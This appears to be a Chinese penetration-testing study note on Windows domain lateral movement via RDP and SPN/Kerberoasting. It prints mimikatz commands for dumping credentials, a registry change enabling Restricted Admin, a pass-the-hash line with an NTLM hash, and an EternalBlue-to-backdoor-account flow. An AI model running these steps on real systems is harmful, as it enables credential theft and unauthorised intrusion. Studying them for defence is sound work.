p69 内网安全-域横向 CobaltStrikeSPNRDP _操作

数据来源
SPN（缩写）_百度百科 ()
演示案例案例1-域横向移动RDP传递-
除了上述讲到的IPC，WMI，SMB等协议的链接外，获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作
RDP协议连接：判断对方远程桌面服务是否开启（默认：3389），端口扫描判断
1）RDP明文密码链接要使用RDP协议控制目标的桌面前提：已经收集到目标主机的远程桌面账号（就是有权限连接到远程桌面的本地或域账号）目标开启了远程桌面服务，默认是3369端口
扫描端口与破解账号：(20条消息) kail - 扫描与爆破_正经人_____的博客-CSDN博客
：（我这里用win7连接做演示）
首先在开启远程桌面
win7的cmd中输入下面的命令
# mstsc是windows系统自带的程序#目标端口mstsc.exe /console /v:192.168.1.61 /admin
Linux:（我是在kali中连接）
# kaili rdesktop rdesktop 192.168.1.61:3389
kali最强的渗透神器 -
这里说到了kali顺便给你们介绍个kali最强的渗透神器 -，使用场景：以永恒之蓝漏洞为例，比如你发现你要攻击的目标没有开启3389端口并且你连他的账号密码都不知道，但是你发现目标的445端口是开启的（这个端口默认是开启的，除非受害者的安全意识很好不然不会关闭），这时你就可以使用利用永恒之蓝漏洞对目标进行攻击（这个漏洞就是利用445端口，不同的漏洞利用的端口也不同，如果你有更好的利用方式我们可以一起交流进步）
说一下大概的利用流程：利用永恒之蓝漏洞对目标进行攻击 —>攻击成功就开启目标的3389端口 ->然后在目标主机上创建一个后门账号以后我们就可以利用这个后门账号进行登录受害者的远程桌面
详情的流程我这里就不多说了，我以前写过一篇利用文章你们需要可以参考一下：Kali最强渗透工具- 系统常用渗透工具_正经人_____的博客-CSDN博客
2）RDP密文HASH链接
官网： - /：一个玩安全的小工具
我这里直接在目标主机使用收集账号的hash
使用cmd启动工具
privilege::debug # 调试sekurlsa::ekeys # 获取 aes
sekurlsa::logonpasswords# 收集PTH攻击方式的NTLM、LM信息
LM是旧版，NILM是新版（我现在用的就是这个）
需要开启Admin mode，在 8.1和2012 R2中默认开启，同时如果Win 7 和2008 R2安装了、补丁也支持；开启命令：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
开启后运行：
# 打开远程桌面的使用教程mstsc.exe /restrictedadminmimikatz.exeprivilege::debugsekurlsa::pth /user:administrator /domain:god /ntlm:442285a710fe49913e8b9a2861781eec "/run:mstsc.exe /restrictedadmin"
net use \\192.168.1.61\c$dir \\192.168.1.61\c$
案例2-域横向移动SPN服务-探针，请求，破解，重写
黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。请求的服务票证的加密类型是，这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为攻击。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是攻击的关键。
探针（要在域账号中执行下面的命令，普通域或域控账号都可以） 1）查看域所有主机的服务